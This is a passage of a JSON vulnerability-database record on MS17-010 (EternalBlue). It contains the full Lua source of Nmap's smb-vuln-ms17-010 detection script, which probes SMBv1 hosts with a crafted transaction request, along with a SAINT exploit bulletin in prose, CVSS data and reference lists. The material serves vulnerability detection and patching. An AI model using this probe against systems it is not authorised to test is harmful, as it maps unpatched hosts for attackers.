IPC$\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. 
\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap -p445 --script smb-vuln-ms17-010 <target>\n\n * nmap -p445 --script vuln <target>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-ms17-010:\n | VULNERABLE:\n | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-0143\n | Risk factor: HIGH\n | A critical remote code execution vulnerability exists in Microsoft SMBv1\n | servers (ms17-010).\n |\n | Disclosure date: 2017-03-14\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n \n\n## Requires \n\n * nmap\n * smb\n * vulns\n * stdnse\n * string\n\n* * *\n", "edition": 4, "enchantments": {}, "hash": "730ebaeaf31c9566f4ee498eb2a763209bd65db06998abe2fbdc3c386a29a547", "hashmap": [{"hash": "2f72f162101e843e99c7a567ce92e387", "key": "modified"}, {"hash": "4bf5c8ffb3442a2104d4824ac7f705a8", "key": "reporter"}, {"hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5", "key": "nmap"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dad749029ff9320d6c901dd9054638ab", "key": "href"}, {"hash": "20306041cbf4a0dc0e69bcb6a4b00b12", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b6f2808e36c38d0e1749fe7cd6221774", "key": "published"}, {"hash": "3c468ec0659e4b43fe35808e6652bd9f", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7c0132070a0ef71d542663e9dc1f5dee", "key": "type"}, {"hash": "fd4a2d6b539b2b10358da6b71e7b6e46", "key": "description"}], "history": [], "href": 
"https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html", "id": "NMAP:SMB-VULN-MS17-010.NSE", "lastseen": "2017-08-23T16:41:07", "modified": "2017-06-27T18:30:33", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "objectVersion": "1.3", "published": "2017-05-27T07:57:34", "references": [], "reporter": "Paulino Calderon <paulino()calderonpale.com>", "sourceData": "\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html>\n <head>\n <title>503 first byte timeout</title>\n </head>\n <body>\n <h1>Error 503 first byte timeout</h1>\n <p>first byte timeout</p>\n <h3>Guru Mediation:</h3>\n <p>Details: cache-fra1240-FRA 1503491074 699704092</p>\n <hr>\n <p>Varnish cache server</p>\n </body>\n</html>\n", "title": "smb-vuln-ms17-010 NSE Script", "type": "nmap", "viewCount": 318}, "differentElements": ["cvss", "cvelist", "sourceData"], "edition": 4, "lastseen": "2017-08-23T16:41:07"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "fd4a2d6b539b2b10358da6b71e7b6e46"}, {"key": "href", "hash": "dad749029ff9320d6c901dd9054638ab"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "5e9a31f584635b52c9b5b992d7c89f09"}, {"key": "nmap", "hash": "9f8fb1e7d3bcd40e4dc80b0759608ca5"}, {"key": "published", "hash": "b6f2808e36c38d0e1749fe7cd6221774"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4bf5c8ffb3442a2104d4824ac7f705a8"}, {"key": "sourceData", "hash": "4c6abb610ef2444ff085206adb66b74b"}, {"key": "title", "hash": 
"3c468ec0659e4b43fe35808e6652bd9f"}, {"key": "type", "hash": "7c0132070a0ef71d542663e9dc1f5dee"}], "hash": "fa027d3602f7146f5362be7cba8e6ce98e136392b1ddb0309305fdb35f3732f6", "viewCount": 1836, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-08-23T12:08:20", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2021-08-23T12:08:20", "rev": 2}}, "objectVersion": "1.6", "sourceData": "local nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code\n execution vulnerability (ms17-010, a.k.a. 
EternalBlue).\n The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.\n\nThe script connects to the $IPC tree, executes a transaction on FID 0 and\n checks if the error \"STATUS_INSUFF_SERVER_RESOURCES\" is returned to\n determine if the target is not patched against ms17-010. Additionally it checks\n for known error codes returned by patched systems.\n\nTested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.\n\nReferences:\n* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n* https://msdn.microsoft.com/en-us/library/ee441489.aspx\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010\n]]\n\n---\n-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>\n-- @usage nmap -p445 --script vuln <target>\n--\n-- @see smb-double-pulsar-backdoor.nse\n--\n-- @output\n-- Host script results:\n-- | smb-vuln-ms17-010:\n-- | VULNERABLE:\n-- | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-0143\n-- | Risk factor: HIGH\n-- | A critical remote code execution vulnerability exists in Microsoft SMBv1\n-- | servers (ms17-010).\n-- |\n-- | Disclosure date: 2017-03-14\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143\n-- | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n-- |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-0143\">\n-- <elem key=\"title\">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-0143</elem>\n-- </table>\n-- <table key=\"description\">\n-- 
<elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"month\">03</elem>\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">14</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-03-14</elem>\n-- <table key=\"refs\">\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>\n-- <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>\n-- </table>\n-- </table>\n--\n-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$\n---\n\nauthor = \"Paulino Calderon <paulino()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\nlocal function check_ms17010(host, port, sharename)\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\".. host.ip .. \"\\\\\" .. 
sharename, nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to '%s'\", sharename)\n return false, string.format(\"Could not connect to '%s'\", sharename)\n else\n local overrides = {}\n local smb_header, smb_params, smb_cmd\n\n stdnse.debug1(\"Connected to share '%s'\", sharename)\n\n overrides['parameters_length'] = 0x10\n\n --SMB_COM_TRANSACTION opcode is 0x25\n smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)\n smb_params = string.pack(\">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2\",\n 0x0, -- Total Parameter count (2 bytes)\n 0x0, -- Total Data count (2 bytes)\n 0xFFFF, -- Max Parameter count (2 bytes)\n 0xFFFF, -- Max Data count (2 bytes)\n 0x0, -- Max setup Count (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x0, -- Flags (2 bytes)\n 0x0, -- Timeout (4 bytes)\n 0x0, -- Reserved (2 bytes)\n 0x0, -- ParameterCount (2 bytes)\n 0x4a00, -- ParameterOffset (2 bytes)\n 0x0, -- DataCount (2 bytes)\n 0x4a00, -- DataOffset (2 bytes)\n 0x02, -- SetupCount (1 byte)\n 0x0, -- Reserved (1 byte)\n 0x2300, -- PeekNamedPipe opcode\n 0x0, --\n 0x0700, -- BCC (Length of \"\\PIPE\\\")\n 0x5c50, -- \\P\n 0x4950, -- IP\n 0x455c -- E\\\n )\n stdnse.debug2(\"SMB: Sending SMB_COM_TRANSACTION\")\n local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)\n if(result == false) then\n stdnse.debug1(\"There was an error in the SMB_COM_TRANSACTION request\")\n return false, err\n end\n\n local result, smb_header, _, _ = smb.smb_read(smbstate)\n if not result then\n stdnse.debug1(\"Error reading SMB response: %s\", smb_header)\n -- error can happen if an (H)IPS resets the connection\n return false, smb_header\n end\n\n local _ , smb_cmd, err = string.unpack(\"<c4 B I4\", smb_header)\n if smb_cmd == 37 then -- SMB command for Trans is 0x25\n stdnse.debug1(\"Valid SMB_COM_TRANSACTION response received\")\n\n --STATUS_INSUFF_SERVER_RESOURCES indicate that the machine is not patched\n if err == 0xc0000205 then\n 
stdnse.debug1(\"STATUS_INSUFF_SERVER_RESOURCES response received\")\n return true\n elseif err == 0xc0000022 then\n stdnse.debug1(\"STATUS_ACCESS_DENIED response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n elseif err == 0xc0000008 then\n stdnse.debug1(\"STATUS_INVALID_HANDLE response received. This system is likely patched.\")\n return false, \"This system is patched.\"\n end\n stdnse.debug1(\"Error code received:%s\", stdnse.tohex(err))\n else\n stdnse.debug1(\"Received invalid command id.\")\n return false, string.format(\"Unexpected SMB response:%s\", stdnse.tohex(err))\n end\n end\nend\n\naction = function(host,port)\n local vuln_status, err\n local vuln = {\n title = \"Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\",\n IDS = {CVE = 'CVE-2017-0143'},\n risk_factor = \"HIGH\",\n description = [[\nA critical remote code execution vulnerability exists in Microsoft SMBv1\n servers (ms17-010).\n ]],\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n 'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'\n },\n dates = {\n disclosure = {year = '2017', month = '03', day = '14'},\n }\n }\n local sharename = stdnse.get_script_args(SCRIPT_NAME .. 
\".sharename\") or \"IPC$\"\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n vuln.state = vulns.STATE.NOT_VULN\n\n vuln_status, err = check_ms17010(host, port, sharename)\n if vuln_status then\n stdnse.debug1(\"This host is missing the patch for ms17-010!\")\n vuln.state = vulns.STATE.VULN\n else\n vuln.state = vulns.STATE.NOT_VULN\n vuln.check_results = err\n end\n return report:make_output(vuln)\nend\n", "nmap": {"categories": ["safe", "vuln"], "scriptType": "hostrule"}, "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "saint": [{"published": "2017-04-26T00:00:00", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": 
["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-07-28T14:33:33", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-07-28T14:33:33", "rev": 2}}, "id": "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "hash": "478250fdb6bc5e8d8bec8e3bfa109998e923f328069a0ee2f1adc0e75a13fb8c", "title": "Windows SMBv1 Remote Command Execution", "bulletinFamily": "exploit", "viewCount": 105, "edition": 4, "reporter": "SAINT Corporation", "references": [], "type": "saint", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "46cfe8ba7ece1f650e5f50e76a93bd99"}, {"key": "href", "hash": "daec4ba69103823e03c8f3c832c5b41d"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "9347e214aa74471d67b0cec25114c5c9"}, {"key": "published", "hash": "9347e214aa74471d67b0cec25114c5c9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a2e6da74c8b179f121f93bda28c97a91"}, {"key": "title", "hash": 
"b3eb3e5939e1290e443adbd9dcd4d55f"}, {"key": "type", "hash": "2a4c1f6b0cd88cf3fac4b56bd4283522"}], "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on 64-bit versions of Windows 7 and Windows Server 2008 R2. 
\n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 1, "hash": "c49cac595db1843f9439e0e5718b1e49c95f07ecc6f1b0607777a951798f2fec", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "daec4ba69103823e03c8f3c832c5b41d", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "b585fb8d48395d7459f226680992c33c", "key": "description"}], "history": [], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "lastseen": "2017-04-29T21:21:12", "modified": "2017-04-26T00:00:00", "objectVersion": "1.2", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 2}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-04-29T21:21:12"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. 
SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-05-29T19:19:31", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": 
["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, 